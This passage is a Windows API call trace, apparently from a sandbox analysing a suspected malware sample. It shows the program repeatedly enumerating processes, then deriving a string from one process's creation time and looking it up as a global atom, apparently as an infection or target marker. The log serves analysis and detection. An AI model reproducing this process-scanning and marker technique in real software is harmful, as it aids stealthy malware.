	[0108.117] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0108.117] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0108.117] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0108.118] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0108.118] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0108.118] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0108.118] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0108.118] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x694
	[0108.118] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.118] CloseHandle (hObject=0x694) returned 1
	[0108.118] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0108.118] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0108.119] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x694
	[0108.119] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.119] CloseHandle (hObject=0x694) returned 1
	[0108.119] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0108.119] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x694
	[0108.119] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.119] CloseHandle (hObject=0x694) returned 1
	[0108.119] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x694
	[0108.119] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.119] CloseHandle (hObject=0x694) returned 1
	[0108.119] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x694
	[0108.119] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.119] CloseHandle (hObject=0x694) returned 1
	[0108.120] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x694
	[0108.120] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.120] CloseHandle (hObject=0x694) returned 1
	[0108.120] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x694
	[0108.120] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.120] CloseHandle (hObject=0x694) returned 1
	[0108.120] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x694
	[0108.120] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.120] CloseHandle (hObject=0x694) returned 1
	[0108.120] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0108.120] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x694
	[0108.120] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.120] CloseHandle (hObject=0x694) returned 1
	[0108.121] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x694
	[0108.121] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.121] CloseHandle (hObject=0x694) returned 1
	[0108.121] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x694
	[0108.121] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.121] CloseHandle (hObject=0x694) returned 1
	[0108.121] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x694
	[0108.121] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.121] CloseHandle (hObject=0x694) returned 1
	[0108.121] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x694
	[0108.124] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.125] CloseHandle (hObject=0x694) returned 1
	[0108.125] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x694
	[0108.125] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.125] CloseHandle (hObject=0x694) returned 1
	[0108.125] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x694
	[0108.125] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.125] CloseHandle (hObject=0x694) returned 1
	[0108.125] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x694
	[0108.125] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.125] CloseHandle (hObject=0x694) returned 1
	[0108.125] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x694
	[0108.125] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.125] CloseHandle (hObject=0x694) returned 1
	[0108.126] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x694
	[0108.126] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.126] CloseHandle (hObject=0x694) returned 1
	[0108.126] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x694
	[0108.126] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.126] CloseHandle (hObject=0x694) returned 1
	[0108.126] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x694
	[0108.126] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.126] CloseHandle (hObject=0x694) returned 1
	[0108.126] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x694
	[0108.126] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.126] CloseHandle (hObject=0x694) returned 1
	[0108.126] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x694
	[0108.126] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.127] CloseHandle (hObject=0x694) returned 1
	[0108.127] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x694
	[0108.127] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.127] CloseHandle (hObject=0x694) returned 1
	[0108.127] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x694
	[0108.127] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.127] CloseHandle (hObject=0x694) returned 1
	[0108.127] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x694
	[0108.127] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.127] CloseHandle (hObject=0x694) returned 1
	[0108.127] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x694
	[0108.127] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.127] CloseHandle (hObject=0x694) returned 1
	[0108.128] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x694
	[0108.128] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.128] CloseHandle (hObject=0x694) returned 1
	[0108.128] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x694
	[0108.128] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.128] CloseHandle (hObject=0x694) returned 1
	[0108.128] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x694
	[0108.128] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.128] CloseHandle (hObject=0x694) returned 1
	[0108.128] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x694
	[0108.128] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.128] CloseHandle (hObject=0x694) returned 1
	[0108.128] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0108.128] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.128] CloseHandle (hObject=0x694) returned 1
	[0108.129] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0108.129] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0108.129] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0108.129] GetProcessTimes (in: hProcess=0x694, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0108.129] wsprintfA (in: param_1=0x39938f8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0108.130] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0108.130] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0108.130] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0108.130] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0108.130] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0108.130] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0108.130] CloseHandle (hObject=0x694) returned 1
	[0108.130] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0108.131] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x694
	[0108.131] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.131] CloseHandle (hObject=0x694) returned 1
	[0108.131] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x694
	[0108.131] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.131] CloseHandle (hObject=0x694) returned 1
	[0108.131] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x694
	[0108.131] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.131] CloseHandle (hObject=0x694) returned 1
	[0108.166] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0108.166] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0108.166] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0108.166] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0108.166] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0108.166] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0108.167] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0108.167] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0108.167] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0108.167] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0108.167] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0108.167] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0108.167] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0108.168] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0108.168] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0108.168] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0108.168] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0108.168] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0108.168] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x694
	[0108.168] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.168] CloseHandle (hObject=0x694) returned 1
	[0108.169] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0108.169] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0108.169] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x694
	[0108.169] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.169] CloseHandle (hObject=0x694) returned 1
	[0108.169] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0108.169] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x694
	[0108.174] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.174] CloseHandle (hObject=0x694) returned 1
	[0108.174] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x694
	[0108.174] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.174] CloseHandle (hObject=0x694) returned 1
	[0108.174] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x694
	[0108.174] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.174] CloseHandle (hObject=0x694) returned 1
	[0108.175] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x694
	[0108.175] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.175] CloseHandle (hObject=0x694) returned 1
	[0108.175] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x694
	[0108.175] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.175] CloseHandle (hObject=0x694) returned 1
	[0108.175] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x694
	[0108.175] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.175] CloseHandle (hObject=0x694) returned 1
	[0108.175] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0108.175] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x694
	[0108.176] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.176] CloseHandle (hObject=0x694) returned 1
	[0108.176] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x694
	[0108.176] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.176] CloseHandle (hObject=0x694) returned 1
	[0108.176] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x694
	[0108.176] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.176] CloseHandle (hObject=0x694) returned 1
	[0108.176] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x694
	[0108.176] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.176] CloseHandle (hObject=0x694) returned 1
	[0108.176] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x694
	[0108.176] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.176] CloseHandle (hObject=0x694) returned 1
	[0108.177] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x694
	[0108.177] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.177] CloseHandle (hObject=0x694) returned 1
	[0108.177] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x694
	[0108.177] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.177] CloseHandle (hObject=0x694) returned 1
	[0108.177] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x694
	[0108.177] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.177] CloseHandle (hObject=0x694) returned 1
	[0108.177] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x694
	[0108.177] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.177] CloseHandle (hObject=0x694) returned 1
	[0108.177] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x694
	[0108.177] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.178] CloseHandle (hObject=0x694) returned 1
	[0108.178] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x694
	[0108.178] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.178] CloseHandle (hObject=0x694) returned 1
	[0108.178] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x694
	[0108.178] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.178] CloseHandle (hObject=0x694) returned 1
	[0108.178] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x694
	[0108.178] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.178] CloseHandle (hObject=0x694) returned 1
	[0108.178] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x694
	[0108.178] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.178] CloseHandle (hObject=0x694) returned 1
	[0108.179] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x694
	[0108.179] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.179] CloseHandle (hObject=0x694) returned 1
	[0108.179] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x694
	[0108.179] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.179] CloseHandle (hObject=0x694) returned 1
	[0108.179] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x694
	[0108.179] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.179] CloseHandle (hObject=0x694) returned 1
	[0108.179] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x694
	[0108.179] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.179] CloseHandle (hObject=0x694) returned 1
	[0108.179] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x694
	[0108.179] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.179] CloseHandle (hObject=0x694) returned 1
	[0108.180] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x694
	[0108.180] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.180] CloseHandle (hObject=0x694) returned 1
	[0108.180] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x694
	[0108.180] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.180] CloseHandle (hObject=0x694) returned 1
	[0108.180] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x694
	[0108.180] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.180] CloseHandle (hObject=0x694) returned 1
	[0108.180] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0108.180] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.180] CloseHandle (hObject=0x694) returned 1
	[0108.181] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0108.181] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0108.181] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0108.181] GetProcessTimes (in: hProcess=0x694, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0108.181] wsprintfA (in: param_1=0x3993d58, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0108.182] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0108.182] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0108.182] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0108.182] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0108.182] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0108.182] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0108.182] CloseHandle (hObject=0x694) returned 1
	[0108.183] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0108.183] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x694
	[0108.183] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.183] CloseHandle (hObject=0x694) returned 1
	[0108.183] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x694
	[0108.183] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.183] CloseHandle (hObject=0x694) returned 1
	[0108.183] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x694
	[0108.183] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.184] CloseHandle (hObject=0x694) returned 1
	[0108.217] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0108.221] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0108.221] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0108.221] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0108.221] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0108.222] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0108.222] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0108.222] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0108.222] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0108.222] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0108.222] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0108.222] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0108.223] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0108.223] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0108.223] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0108.223] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0108.223] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0108.223] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0108.224] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x694
	[0108.224] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.224] CloseHandle (hObject=0x694) returned 1
	[0108.224] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0108.224] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0108.224] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x694
	[0108.224] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.224] CloseHandle (hObject=0x694) returned 1
	[0108.225] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0108.225] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x694
	[0108.225] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.225] CloseHandle (hObject=0x694) returned 1
	[0108.225] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x694
